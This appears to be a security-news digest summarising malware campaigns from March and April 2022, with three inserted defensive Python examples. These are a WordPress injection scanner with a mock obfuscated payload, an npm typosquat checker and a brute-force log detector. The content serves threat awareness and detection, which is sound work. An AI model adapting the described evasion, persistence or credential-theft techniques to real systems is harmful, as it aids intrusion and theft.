Cybersecurity researchers are warning of two different information-stealing malware, named FFDroider and Lightning Stealer, that are capable of siphoning data and launching further attacks. "Designed to send stolen credentials and cookies to a Command & Control server, FFDroider disguises itself on victim's machines to look like the instant messaging application 'Telegram,'" Zscaler ThreatLabz researchers Avinash Kumar and Niraj Shivtarkar said in a report published last week. Information stealers, as the name implies, are equipped to harvest sensitive information from compromised machines, such as keystrokes, screenshots, files, saved passwords and cookies from web browsers, that are then transmitted to a remote attacker-controlled domain. FFDroider is distributed through cracked versions of installers and freeware with the primary objective of stealing cookies and credentials associated with popular social media and e-commerce platforms and usingThe Hacker News
April 10, 2022
New Meta information stealer distributed in malspam campaign Full Text
Abstract
Independent analyst Brad Duncan has spotted a malspam campaign delivering META, a new info-stealer malware that appears to be rising in popularity among cybercriminals.BleepingComputer
April 09, 2022
New Android banking malware remotely takes control of your device Full Text
Abstract
A new Android banking malware named Octo has appeared in the wild, featuring remote access capabilities that allow malicious operators to perform on-device fraud.BleepingComputer
April 9, 2022
SharkBot Banking Trojan spreads through fake AV apps on Google Play Full Text
Abstract
Experts discovered malicious Android apps on the Google Play Store masqueraded as antivirus solutions spreading the SharkBot Trojan. Researchers from the Check Point Research (CPR) team discovered several malicious Android apps on the official Google...Security Affairs
April 08, 2022
Mirai malware now delivered using Spring4Shell exploits Full Text
Abstract
The Mirai malware is now leveraging the Spring4Shell exploit to infect vulnerable web servers and recruit them for DDoS (distributed denial of service) attacks.BleepingComputer
April 07, 2022
New Octo Banking Trojan Spreading via Fake Apps on Google Play Store Full Text
Abstract
A number of rogue Android apps that have been cumulatively installed from the official Google Play Store more than 50,000 times are being used to target banks and other financial entities. The rental banking trojan, dubbed Octo, is said to be a rebrand of another Android malware called ExobotCompact, which, in turn, is a "lite" replacement for its Exobot predecessor, Dutch mobile security firm ThreatFabric said in a report shared with The Hacker News. Exobot is also said to have likely paved the way for a separate descendant called Coper, which was initially discovered targeting Colombian users around July 2021, with newer infections targeting Android users in different European countries. "Coper malware apps are modular in design and include a multi-stage infection method and many defensive tactics to survive removal attempts," cybersecurity company Cyble noted in an analysis of the malware last month. Like other Android banking trojans, the rogue appsThe Hacker News
April 7, 2022
The Mysterious Borat RAT is an All-In-One Threat Full Text
Abstract
Cyble discovered a new RAT, dubbed Borat. With a builder, feature modules, and a server certificate, it offers ransomware and DDoS attack capabilities. It is not known whether Borat is being sold or freely shared among cybercriminals. While analyzing the campaign and digging into its origin, a res ...Cyware Alerts - Hacker News
April 07, 2022
First Malware Targeting AWS Lambda Serverless Platform Discovered Full Text
Abstract
A first-of-its-kind malware targeting Amazon Web Services' (AWS) Lambda serverless computing platform has been discovered in the wild. Dubbed "Denonia" after the name of the domain it communicates with, "the malware uses newer address resolution techniques for command and control traffic to evade typical detection measures and virtual network access controls," Cado Labs researcher Matt Muir said. The artifact analyzed by the cybersecurity company was uploaded to the VirusTotal database on February 25, 2022, sporting the name "python" and packaged as a 64-bit ELF executable. However, the filename is a misnomer, as Denonia is programmed in Go and harbors a customized variant of the XMRig cryptocurrency mining software. That said, the mode of initial access is unknown, although it's suspected it may have involved the compromise of AWS Access and Secret Keys. Another notable feature of the malware is its use of DNS over HTTPS (DoH) for cThe Hacker News
April 7, 2022
Colibri Loader employs clever persistence mechanism Full Text
Abstract
Recently discovered malware loader Colibri leverages a trivial and efficient persistence mechanism to deploy Windows Vidar data stealer. Malwarebytes researchers observed a new loader, dubbed Colibri, which has been used to deploy a Windows information...Security Affairs
April 7, 2022
MacOS Malware: Myth vs. Truth – Podcast Full Text
Abstract
Huntress Labs R&D Director Jamie Levy busts the old “Macs don’t get viruses” myth and offers tips on how MacOS malware differs and how to protect against it.Threatpost
April 07, 2022
New malware targets serverless AWS Lambda with cryptominers Full Text
Abstract
Security researchers have discovered the first malware specifically developed to target Amazon Web Services (AWS) Lambda cloud environments with cryptominers.BleepingComputer
April 7, 2022
Beastmode Powered With Newly Added Exploits Full Text
Abstract
A Mirai variant called Beastmode was found exploiting disclosed vulnerabilities in TOTOLINK routers. Attackers abused five new exploits within a month. Beastmode has also added some older bugs affecting routers from several other vendors, all rated 9.8 on the CVSS scale. TOTOLINK device users ar ...Cyware Alerts - Hacker News
April 07, 2022
SharkBot Banking Trojan Resurfaces On Google Play Store Hidden Behind 7 New Apps Full Text
Abstract
As many as seven malicious Android apps discovered on the Google Play Store masqueraded as antivirus solutions to deploy a banking trojan called SharkBot . "SharkBot steals credentials and banking information," Check Point researchers Alex Shamshur and Raman Ladutska said in a report shared with The Hacker News. "This malware implements a geofencing feature and evasion techniques, which makes it stand out from the rest of malwares." Particularly, the malware is designed to ignore users from China, India, Romania, Russia, Ukraine, and Belarus. The rogue apps are said to have been installed more than 15,000 times prior to their removal, with most of the victims located in Italy and the U.K. The report complements previous findings from NCC Group, which found the bankbot posing as antivirus apps to carry out unauthorized transactions via Automatic Transfer Systems (ATS). SharkBot takes advantage of Android's Accessibility Services permissions to presentThe Hacker News
April 07, 2022
Malicious web redirect service infects 16,500 sites to push malware Full Text
Abstract
A new TDS (Traffic Direction System) operation called Parrot has emerged in the wild, having already infected servers hosting 16,500 websites of universities, local governments, adult content platforms, and personal blogs.BleepingComputer
April 07, 2022
Researchers Uncover How Colibri Malware Stays Persistent on Hacked Systems Full Text
Abstract
Cybersecurity researchers have detailed a "simple but efficient" persistence mechanism adopted by a relatively nascent malware loader called Colibri , which has been observed deploying a Windows information stealer known as Vidar as part of a new campaign. "The attack starts with a malicious Word document deploying a Colibri bot that then delivers the Vidar Stealer," Malwarebytes Labs said in an analysis. "The document contacts a remote server at (securetunnel[.]co) to load a remote template named 'trkal0.dot' that contacts a malicious macro," the researchers added. First documented by FR3D.HK and Indian cybersecurity company CloudSEK earlier this year, Colibri is a malware-as-a-service (MaaS) platform that's engineered to drop additional payloads onto compromised systems. Early signs of the loader appeared on Russian underground forums in August 2021. "This loader has multiple techniques that help avoid detection," CloudSEK rThe Hacker News
April 07, 2022
Android apps with 45 million installs used data harvesting SDK Full Text
Abstract
Mobile malware analysts warn about a set of applications available on the Google Play Store, which collected sensitive user data from over 45 million devices.BleepingComputer
April 6, 2022
New Denonia Malware Targets AWS Lambda Environments Full Text
Abstract
Lambda is a scalable serverless compute service offered by Amazon Web Services (AWS) that runs customer code on demand while AWS handles server and OS maintenance, capacity provisioning and logging; it underpins numerous backend services.ZDNet
April 06, 2022
New FFDroider malware steals Facebook, Instagram, Twitter accounts Full Text
Abstract
A new information stealer named FFDroider has emerged, stealing credentials and cookies stored in browsers to hijack victims' social media accounts.BleepingComputer
April 06, 2022
Hackers Distributing Fake Shopping Apps to Steal Banking Data of Malaysian Users Full Text
Abstract
Threat actors have been distributing malicious applications under the guise of seemingly harmless shopping apps to target customers of eight Malaysian banks since at least November 2021. The attacks involved setting up fraudulent but legitimate-looking websites to trick users into downloading the apps, Slovak cybersecurity firm ESET said in a report shared with The Hacker News. The copycat websites impersonated cleaning services such as Maid4u, Grabmaid, Maria's Cleaning, YourMaid, Maideasy and MaidACall and a pet store named PetsMore, all of which are aimed at users in Malaysia. "The threat actors use these fake e-shop applications to phish for banking credentials," ESET said. "The apps also forward all SMS messages received by the victim to the malware operators in case they contain 2FA codes sent by the bank." The targeted banks include Maybank, Affin Bank, Public Bank Berhad, CIMB bank, BSN, RHB, Bank Islam Malaysia, and Hong Leong Bank. ThThe Hacker News
April 6, 2022
Fake Android Shopping Applications Steal Bank Account Logins, 2FA Codes Full Text
Abstract
On Wednesday, ESET's cybersecurity team published new research documenting three separate fake apps targeting customers who belong to eight Malaysian banks to steal their account logins.ZDNet
April 5, 2022
AsyncRAT campaigns feature new version of 3LOSH crypter Full Text
Abstract
The threat actor(s) behind these campaigns have been using 3LOSH to generate the obfuscated code responsible for the initial infection process. The same operator is likely distributing a variety of commodity RATs, such as AsyncRAT and LimeRAT.Cisco Talos
April 5, 2022
Thwarting Loaders: From SocGholish to BLISTER’s LockBit Payload Full Text
Abstract
SocGholish has been around longer than BLISTER, having already established itself well among threat actors for its advanced delivery framework. Reports show that its framework of attack has previously been used by threat actors from as early as 2020.Trend Micro
April 04, 2022
WhatsApp voice message phishing emails push info-stealing malware Full Text
Abstract
A new WhatsApp phishing campaign impersonating WhatsApp's voice message feature has been discovered, attempting to spread information-stealing malware to at least 27,655 email addresses.BleepingComputer
April 04, 2022
Experts Shed Light on BlackGuard Infostealer Malware Sold on Russian Hacking Forums Full Text
Abstract
A previously undocumented "sophisticated" information-stealing malware named BlackGuard is being advertised for sale on Russian underground forums for a monthly subscription of $200. "BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients," Zscaler ThreatLabz researchers Mitesh Wani and Kaivalya Khursale said in a report published last week. Also sold for a lifetime price of $700, BlackGuard is designed as a .NET-based malware that's actively under development, boasting a number of anti-analysis, anti-debugging and evasion features that allow it to kill processes related to antivirus engines and bypass string-based detection. What's more, it checks the IP address of the infected device by sending a request to the domain "https://ipwhois[.]app/xml/" and exits if the country is one among the Commonwealth of IndepThe Hacker News
April 4, 2022
Borat RAT, a new RAT that performs ransomware and DDoS attacks Full Text
Abstract
Cyble researchers discovered a new remote access trojan (RAT) named Borat capable of conducting DDoS and ransomware attacks. Researchers from threat intelligence firm Cyble discovered a new RAT, named Borat, that enables operators to gain full access...Security Affairs
April 03, 2022
New Borat remote access malware is no laughing matter Full Text
Abstract
A new remote access trojan (RAT) named Borat has appeared on darknet markets, offering easy-to-use features to conduct DDoS attacks, UAC bypass, and ransomware deployment.BleepingComputer
April 2, 2022
WordPress Popunder Malware Redirects to Scam Sites Full Text
Abstract
The malware is always injected into the active theme's footer.php file and contains obfuscated JavaScript placed after a long series of empty lines in an attempt to stay hidden from anyone who opens the file in the theme editor.Security Boulevard
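The two traits named above (a long run of blank lines followed by an obfuscated inline script) are cheap to check for mechanically. The scanner below is an added example written for this page, not code from Sucuri or Security Boulevard; the blank-line threshold and the list of obfuscation primitives it looks for are assumptions, and the footer.php contents are constructed samples.

```python
"""Scan WordPress theme files for the footer.php popunder injection pattern:
obfuscated JavaScript pushed off-screen behind a long run of empty lines.
Added example; thresholds and the obfuscation-primitive list are assumptions."""
import re
from pathlib import Path

# Assumption: no legitimate theme file contains this many consecutive blank lines.
BLANK_RUN = 50

SCRIPT_TAG = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
# Primitives that decode-and-run obfuscated payloads; any of them inside an
# inline <script> in a theme file deserves a look.
SUSPICIOUS = re.compile(
    r"eval\(|atob\(|unescape\(|String\.fromCharCode|\\x[0-9a-f]{2}", re.I)


def longest_blank_run(text: str) -> int:
    """Length of the longest run of empty or whitespace-only lines."""
    best = run = 0
    for line in text.splitlines():
        run = run + 1 if not line.strip() else 0
        best = max(best, run)
    return best


def scan_theme_file(text: str, blank_run: int = BLANK_RUN) -> list:
    """Return a list of finding strings for one file; empty means clean."""
    findings = []
    run = longest_blank_run(text)
    if run >= blank_run:
        findings.append(f"{run} consecutive blank lines (padding to push code off-screen)")
    for m in SCRIPT_TAG.finditer(text):
        hits = sorted({h.group(0) for h in SUSPICIOUS.finditer(m.group(1))})
        if hits:
            findings.append("inline script using obfuscation primitives: " + ", ".join(hits))
    return findings


def scan_theme_dir(root: str, names=("footer.php", "header.php")) -> dict:
    """Scan the named files under every theme in `root`; returns {path: findings}."""
    results = {}
    for path in Path(root).rglob("*.php"):
        if path.name in names:
            findings = scan_theme_file(path.read_text(errors="replace"))
            if findings:
                results[str(path)] = findings
    return results


# Constructed samples: a clean footer and the same footer with an injected
# payload hidden behind 100 empty lines.
CLEAN_FOOTER = "<?php wp_footer(); ?>\n</body>\n</html>"
INFECTED_FOOTER = (CLEAN_FOOTER + "\n" * 101
                   + "<script>eval(String.fromCharCode(100,111,99));</script>")

if __name__ == "__main__":
    for label, body in (("clean", CLEAN_FOOTER), ("infected", INFECTED_FOOTER)):
        print(label, scan_theme_file(body) or "no findings")
```

Run it against `wp-content/themes/` with `scan_theme_dir`; a theme file that trips both checks at once is the pattern described in the article, while a single hit (a long blank run alone, or `atob(` in a legitimate analytics snippet) is only a prompt to read the file.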
April 01, 2022
Newly found Android malware records audio, tracks your location Full Text
Abstract
A previously unknown Android malware uses the same shared-hosting infrastructure previously seen in use by the Russian APT group known as Turla, though attribution to the hacking group is not possible.BleepingComputer
April 1, 2022
Verblecon: A New Advanced Malware Loader Full Text
Abstract
A threat actor was spotted employing a sophisticated malware loader, dubbed Verblecon, to deploy cryptocurrency miners on compromised systems and steal access tokens of Discord chat app users. There are reports that connect a Verblecon domain to a ransomware attack as well. Organizations are recommended to use up-to-date and reli ...Cyware Alerts - Hacker News
April 1, 2022
AcidRain, a wiper that crippled routers and modems in Europe Full Text
Abstract
Researchers spotted a new destructive wiper, tracked as AcidRain, that is likely linked to the recent attack against Viasat. Security researchers at SentinelLabs have spotted a previously undetected destructive wiper, tracked as AcidRain, that hit routers...Security Affairs
March 31, 2022
New BlackGuard password-stealing malware sold on hacker forums Full Text
Abstract
A new information-stealing malware named BlackGuard is winning the attention of the cybercrime community, now sold on numerous darknet markets and forums for a lifetime price of $700 or a subscription of $200 per month.BleepingComputer
March 31, 2022
Bad OPSEC allowed researchers to uncover Mars stealer operation Full Text
Abstract
The Morphisec Labs researchers analyzed a new malware, tracked as Mars stealer, which is based on the older Oski Stealer. Morphisec Labs recently discovered the Mars stealer that was spreading masqueraded as malicious software cracks and keygens. The...Security Affairs
March 30, 2022
Crypto Stealing Malware Spreads via Fake Wallet Apps Full Text
Abstract
Researchers found dozens of trojanized cryptocurrency wallet apps attempting to steal cryptocurrency funds, especially from Chinese users. ESET researchers have revealed over 40 copycat websites of popular cryptocurrency wallets. Smartphone users are advised to stay vigilant and use genuine ...Cyware Alerts - Hacker News
March 29, 2022
Mars Stealer malware pushed via OpenOffice ads on Google Full Text
Abstract
A newly launched information-stealing malware variant called Mars Stealer is rising in popularity, and threat analysts are now spotting the first notable large-scale campaigns employing it.BleepingComputer
March 29, 2022
New JSSLoader Variant Uses XLL Files to Evade Detection Full Text
Abstract
A new wave of JSSLoader infections, operated by the FIN7 threat group, was observed using XLL files to deliver the malware via malicious Microsoft Excel add-ins. The latest variant comes with new layers of obfuscation to keep itself hidden from security analysts. Organizations need to have int ...Cyware Alerts - Hacker News
March 29, 2022
New Malware Loader ‘Verblecon’ Infects Hacked PCs with Cryptocurrency Miners Full Text
Abstract
An unidentified threat actor has been observed employing a "complex and powerful" malware loader with the ultimate objective of deploying cryptocurrency miners on compromised systems and potentially facilitating the theft of Discord tokens. "The evidence found on victim networks appears to indicate that the goal of the attacker was to install cryptocurrency mining software on victim machines," researchers from the Symantec Threat Hunter Team, part of Broadcom Software, said in a report shared with The Hacker News. "This would appear to be a relatively low-reward goal for the attacker given the level of effort that would have been required to develop this sophisticated malware." This advanced piece of malware, dubbed Verblecon, is said to have been first spotted two months ago in January 2022, with the payload incorporating polymorphic qualities to evade signature-based detections by security software. In addition, the loader carries out further aThe Hacker News
March 29, 2022
Experts Detail Virtual Machine Used by Wslink Malware Loader for Obfuscation Full Text
Abstract
Cybersecurity researchers have shed more light on a malicious loader that runs as a server and executes received modules in memory, laying bare the structure of an "advanced multi-layered virtual machine" used by the malware to fly under the radar. Wslink, as the malicious loader is called, was first documented by Slovak cybersecurity company ESET in October 2021, with very few telemetry hits detected in the past two years spanning Central Europe, North America, and the Middle East. Analysis of the malware samples has yielded little to no clues about the initial compromise vector used, and no code, functionality, or operational similarities have been uncovered to suggest that this is a tool from a previously identified threat actor. Packed with a file compression utility named NsPack, Wslink makes use of what's called a process virtual machine (VM), a mechanism to run an application in a platform-independent manner that abstracts the underlying hardware or operaThe Hacker News
March 29, 2022
Verblecon malware loader used in stealthy crypto mining attacks Full Text
Abstract
Security researchers are warning of a relatively new malware loader that they track as Verblecon, which is sufficiently complex and powerful for ransomware and espionage attacks, although it is currently used for low-reward attacks.BleepingComputer
March 28, 2022
Update: Hundreds more packages found in malicious npm ‘factory’ Full Text
Abstract
On Monday, Checkmarx researchers said they have also been tracking these activities and have recorded over 600 malicious packages published over five days, bringing the total to over 700.ZDNet
March 28, 2022
Malware-as-a-Service Gains Prominence in Threat Landscape Full Text
Abstract
While organizations have improved their backup strategy, ransomware groups are responding by exfiltrating sensitive data and threatening to expose it. Cybercriminals are still shifting to living-off-the-land attack techniques.Cyware Alerts - Hacker News
March 25, 2022
Storm Cloud Attempting To GIMMICK macOS Users Full Text
Abstract
Volexity disclosed a newly discovered macOS variant of GIMMICK, a malware implant developed by a Chinese group tracked as Storm Cloud. It is targeting organizations across Asia. The GIMMICK samples are large and complex, which suggests the threat actor behind it is well res ...Cyware Alerts - Hacker News
March 24, 2022
Microsoft Help Files Disguise Vidar Malware Full Text
Abstract
Attackers are hiding interesting malware in a boring place, hoping victims won’t bother to look.Threatpost
March 24, 2022
How to Build a Custom Malware Analysis Sandbox Full Text
Abstract
Before hunting malware, every researcher needs to find a system where to analyze it. There are several ways to do it: build your own environment or use third-party solutions. Today we will walk through all the steps of creating a custom malware sandbox where you can perform a proper analysis without infecting your computer, and then compare it with a ready-made service. Why do you need a malware sandbox? A sandbox allows you to detect cyber threats and analyze them safely. All information remains secure, and a suspicious file can't access the host system. You can monitor malware processes, identify their patterns and investigate behavior. Before setting up a sandbox, you should have a clear goal of what you want to achieve through the lab. There are two ways to organize your working space for analysis: Custom sandbox. Made from scratch by an analyst on their own, specifically for their needs. A turnkey solution. A versatile service with a range of configurations to meet yoThe Hacker News
March 24, 2022
Over 200 Malicious NPM Packages Caught Targeting Azure Developers Full Text
Abstract
A new large-scale supply chain attack has been observed targeting Azure developers with no less than 218 malicious NPM packages with the goal of stealing personally identifiable information. "After manually inspecting some of these packages, it became apparent that this was a targeted attack against the entire @azure NPM scope, by an attacker that employed an automatic script to create accounts and upload malicious packages that cover the entirety of that scope," JFrog researchers Andrey Polkovnychenko and Shachar Menashe said in a new report. The entire set of malicious packages was disclosed to the NPM maintainers roughly two days after they were published, leading to their quick removal, but not before each of the packages was downloaded around 50 times on average. The attack refers to what's called typosquatting, which takes place when bad actors push rogue packages with names mimicking legitimate libraries to a public software registry such as NPM or PyPI witThe Hacker News
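The scope-wide attack above relies on a developer (or a script) installing a name that looks like one of the `@azure/*` packages but is not. The check below is an added example for this page, not JFrog's tooling: it assumes the organisation keeps an allow-list of the scoped packages it actually uses, flags an unscoped name that equals the path part of an allow-listed scoped package (the shape the article describes), and additionally flags near-miss spellings of either form. The allow-list and the package.json-style input are constructed.

```python
"""Flag npm dependency names that collide with, or mimic, an allow-list of
scoped packages. Added example, not JFrog's code; the allow-list below is a
constructed sample standing in for an organisation's own list."""
from difflib import SequenceMatcher

# Assumption: the scoped packages the organisation legitimately depends on.
KNOWN_SCOPED = {
    "@azure/core-tracing",
    "@azure/identity",
    "@azure/storage-blob",
}


def _unscoped(name: str) -> str:
    """'@azure/identity' -> 'identity'; names without a scope are returned as-is."""
    return name.split("/", 1)[1] if name.startswith("@") and "/" in name else name


def _similarity(a: str, b: str) -> float:
    return SequenceMatcher(None, a, b).ratio()


def classify(candidate: str, known=KNOWN_SCOPED, threshold: float = 0.85) -> str:
    """Return 'ok', 'scope-confusion' or 'lookalike' for one package name.

    scope-confusion: an unscoped name equal to the path part of a known scoped
                     package, e.g. 'identity' standing in for '@azure/identity'.
    lookalike:       a name within `threshold` similarity of a known name (scoped
                     or unscoped form) without being identical to it.
    """
    if candidate in known:
        return "ok"
    known_unscoped = {_unscoped(k) for k in known}
    if not candidate.startswith("@") and candidate in known_unscoped:
        return "scope-confusion"
    for k in known:
        for target in (k, _unscoped(k)):
            if candidate != target and _similarity(candidate, target) >= threshold:
                return "lookalike"
    return "ok"


def audit_dependencies(deps: dict, known=KNOWN_SCOPED) -> dict:
    """Audit a package.json-style {name: version} mapping; returns flagged names."""
    flagged = {}
    for name in deps:
        verdict = classify(name, known)
        if verdict != "ok":
            flagged[name] = verdict
    return flagged


if __name__ == "__main__":
    # Constructed "dependencies" block resembling a project's package.json.
    sample = {
        "@azure/identity": "^2.0.0",
        "core-tracing": "1.0.0",          # unscoped twin of @azure/core-tracing
        "@azure/storage-blb": "12.0.0",   # one character off
        "left-pad": "1.3.0",
    }
    for name, verdict in audit_dependencies(sample).items():
        print(f"{name}: {verdict}")
```

The similarity threshold is deliberately loose so that it errs toward review; in a CI step the scope-confusion verdict is the one worth failing the build on, because an unscoped name that exactly mirrors a scoped one has no legitimate reason to appear in an `@azure` consumer's manifest.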
March 24, 2022
Malicious Microsoft Excel add-ins used to deliver RAT malware Full Text
Abstract
Researchers report a new version of the JSSLoader remote access trojan being distributed via malicious Microsoft Excel add-ins.BleepingComputer
March 24, 2022
Vidar spyware is now hidden in Microsoft help files Full Text
Abstract
According to Trustwave, the email campaign distributing Vidar is not very sophisticated. The email contains a generic subject line and an attachment, "request.doc," which is actually a .iso disk image.ZDNet
March 23, 2022
BitRAT Spreads as Windows Activator Full Text
Abstract
A new BitRAT malware campaign is leveraging illegal crack tools for Windows 10 license verification. The campaign targets users looking to activate pirated Windows OS versions for free via webhards. BitRAT supports generic keylogging, audio recording, clipboard monitoring, credential theft from web ...Cyware Alerts - Hacker News
March 23, 2022
New Variant of Chinese Gimmick Malware Targeting macOS Users Full Text
Abstract
Researchers have disclosed details of a newly discovered macOS variant of a malware implant developed by a Chinese espionage threat actor known to attack organizations across Asia. Attributing the attacks to a group tracked as Storm Cloud, cybersecurity firm Volexity characterized the new malware, dubbed Gimmick, as a "feature-rich, multi-platform malware family that uses public cloud hosting services (such as Google Drive) for command-and-control (C2) channels." The cybersecurity firm said it recovered the sample through memory analysis of a compromised MacBook Pro running macOS 11.6 (Big Sur) as part of an intrusion campaign that took place in late 2021. "Storm Cloud is an advanced and versatile threat actor, adapting its tool set to match different operating systems used by its targets," Volexity researchers Damien Cash, Steven Adair, and Thomas Lancaster said in a report. "They make use of built-in operating system utilities, open-source tooThe Hacker News
March 23, 2022
Slithering Serpent - New Backdoor and a Unique Attack Chain Full Text
Abstract
An unknown and likely sophisticated threat actor is leveraging a unique amalgamation of open-source software, a detection bypass technique, and steganography to attack French entities.Cyware Alerts - Hacker News
March 23, 2022
DirtyMoe Modules Introduce Worm-Like Features Full Text
Abstract
Avast researchers have observed three main ways in which the malware is being disseminated - PurpleFox EK, PurpleFox Worm, and injected Telegram installers. It is likely that the malware propagates through other methods too.Cyware Alerts - Hacker News
March 23, 2022
New JSSLoader Trojan Delivered Through XLL Files Full Text
Abstract
Attackers are now using .XLL files to deliver a new, obfuscated version of JSSLoader. This new malware variant utilizes the Excel add-ins feature to load the malware and inspect the changes inside.Morphisec
March 22, 2022
Custom macOS malware of Chinese hackers ‘Storm Cloud’ exposed Full Text
Abstract
Researchers have discovered a previously unknown macOS malware variant called GIMMICK, which is believed to be a custom tool used by a Chinese espionage threat actor known as 'Storm Cloud.'BleepingComputer
March 21, 2022
BitRAT malware now spreading as a Windows 10 license activator Full Text
Abstract
A new BitRAT malware distribution campaign is underway, exploiting users looking to activate pirated Windows OS versions for free using unofficial Microsoft license activators.BleepingComputer
March 21, 2022
Android password-stealing malware infects 100,000 Google Play users Full Text
Abstract
A malicious Android app that steals Facebook credentials has been installed over 100,000 times via the Google Play Store, with the app still available to download.BleepingComputer
March 21, 2022
Gh0stCringe Targets Weakly Configured Microsoft SQL, MySQL Servers Full Text
Abstract
AhnLab found a malware threat dubbed Gh0stCringe targeting Oracle's open-source MySQL and Microsoft's SQL Server by abusing weak user credentials. Moreover, researchers have identified multiple malware samples, such as KingMiner and Vollgar CoinMiner, on the targeted servers. Experts say frequen ...Cyware Alerts - Hacker News
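Because the initial access here is plain password guessing against exposed database services, the earliest signal is a burst of failed logins from one client. The detector below is an added example for this page, not AhnLab's tooling: it parses failed-login lines in the formats SQL Server's ERRORLOG and MySQL's error log use, then applies a sliding window per client address. The log lines are constructed, and the threshold and window are assumptions to be tuned per environment.

```python
"""Detect password guessing against SQL Server / MySQL from failed-login lines.
Added example with constructed log lines; threshold and window are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# SQL Server ERRORLOG, e.g.
# "2022-03-21 10:15:32.11 Logon       Login failed for user 'sa'. Reason: ... [CLIENT: 203.0.113.5]"
MSSQL = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+Logon\s+Login failed for user "
    r"'(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
# MySQL 8 error log, e.g.
# "2022-03-21T10:15:40.000000Z 12 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.9' ..."
MYSQL = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)\.\d+Z .*Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<ip>[^']+)'")


def parse_failures(lines):
    """Yield (timestamp, user, client_ip) for every failed-login line recognised."""
    for line in lines:
        m = MSSQL.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"], m["ip"]
            continue
        m = MYSQL.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S"), m["user"], m["ip"]


def brute_force_sources(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: {"attempts": n, "users": [...]}} for every client with at
    least `threshold` failures inside any span of length `window` (sliding window)."""
    per_ip = defaultdict(list)
    for ts, user, ip in parse_failures(lines):
        per_ip[ip].append((ts, user))
    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {"attempts": len(events),
                               "users": sorted({u for _, u in events})}
                break
    return flagged


# Constructed sample: one guessing client, one stray failure, two MySQL failures.
SAMPLE_LOG = [
    "2022-03-21 10:15:31.00 Server      SQL Server is now ready for client connections.",
    "2022-03-21 10:15:32.11 Logon       Login failed for user 'sa'. Reason: Password did not match. [CLIENT: 203.0.113.5]",
    "2022-03-21 10:15:33.02 Logon       Login failed for user 'sa'. Reason: Password did not match. [CLIENT: 203.0.113.5]",
    "2022-03-21 10:15:35.40 Logon       Login failed for user 'admin'. Reason: Could not find a login. [CLIENT: 203.0.113.5]",
    "2022-03-21 10:15:38.77 Logon       Login failed for user 'sa'. Reason: Password did not match. [CLIENT: 203.0.113.5]",
    "2022-03-21 10:15:40.10 Logon       Login failed for user 'sa'. Reason: Password did not match. [CLIENT: 203.0.113.5]",
    "2022-03-21 10:15:41.55 Logon       Login failed for user 'admin'. Reason: Could not find a login. [CLIENT: 203.0.113.5]",
    "2022-03-21 10:16:02.00 Logon       Login failed for user 'reporting'. Reason: Password did not match. [CLIENT: 198.51.100.7]",
    "2022-03-21T10:15:40.000000Z 12 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.9' (using password: YES)",
    "2022-03-21T10:15:41.000000Z 13 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.9' (using password: YES)",
]

if __name__ == "__main__":
    for ip, info in brute_force_sources(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} failures, users tried: {', '.join(info['users'])}")
```

The same function applies to a real ERRORLOG via `brute_force_sources(open(path))`; on a server that should never be reachable from the internet, the more useful output is often not the count but the client address itself, since any failed login from a public IP means the listener is exposed.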
March 21, 2022
New Backdoor Targets French Entities via Open-Source Package Installer Full Text
Abstract
Researchers have exposed a new targeted email campaign aimed at French entities in the construction, real estate, and government sectors that leverages the Chocolatey Windows package manager to deliver a backdoor called Serpent on compromised systems. Enterprise security firm Proofpoint attributed the attacks to a likely advanced threat actor based on the tactics and the victimology patterns observed. The ultimate objective of the campaign remains presently unknown. "The threat actor attempted to install a backdoor on a potential victim's device, which could enable remote administration, command and control (C2), data theft, or deliver other additional payloads," Proofpoint researchers said in a report shared with The Hacker News. The phishing lure that triggers the infection sequence makes use of a resume-themed subject line, with the attached macro-embedded Microsoft Word document masquerading as information related to the European Union's General Data ProtThe Hacker News
March 21, 2022
Influx of Trojanized Apps on Google Play Store Full Text
Abstract
Dr.Web disclosed numerous trojanized apps on the Google Play Store prompting potential victims to take actions such as depositing money for trading or signing up for expensive subscriptions, ultimately benefiting the scammers. The detected malicious apps include SecretVideoRecorder, FakeAntiVirus, Key ...Cyware Alerts - Hacker News
March 17, 2022
Kwampirs Malware Linked with Shamoon Full Text
Abstract
Security experts linked the activities of the Shamoon APT with those behind the Kwampirs malware. They said both could be from the same group, as they have been collaborating and sharing updates, techniques, and code for years. Organizations should be ready with countermeasures including reliable anti-malware ...Cyware Alerts - Hacker News
March 17, 2022
ASUS warns of Cyclops Blink malware attacks targeting routers Full Text
Abstract
Multiple ASUS router models are vulnerable to the Russia-linked Cyclops Blink malware threat, causing the vendor to publish an advisory with mitigations for the security risk.BleepingComputer
March 17, 2022
TrickBot Malware Abusing MikroTik Routers as Proxies for Command-and-Control Full Text
Abstract
Microsoft on Wednesday detailed a previously undiscovered technique put to use by the TrickBot malware that involves using compromised Internet of Things (IoT) devices as a go-between for establishing communications with the command-and-control (C2) servers. "By using MikroTik routers as proxy servers for its C2 servers and redirecting the traffic through non-standard ports, TrickBot adds another persistence layer that helps malicious IPs evade detection by standard security systems," Microsoft's Defender for IoT Research Team and Threat Intelligence Center (MSTIC) said . TrickBot, which emerged as a banking trojan in 2016, has evolved into a sophisticated and persistent threat, with its modular architecture enabling it to adapt its tactics to suit different networks, environments, and devices as well as offer access-as-a-service for next-stage payloads like Conti ransomware. The expansion to TrickBot's capabilities comes amid reports of its infrastructure goinThe Hacker News
March 15, 2022
Raccoon Stealer Using Telegram for Hidden Communications Full Text
Abstract
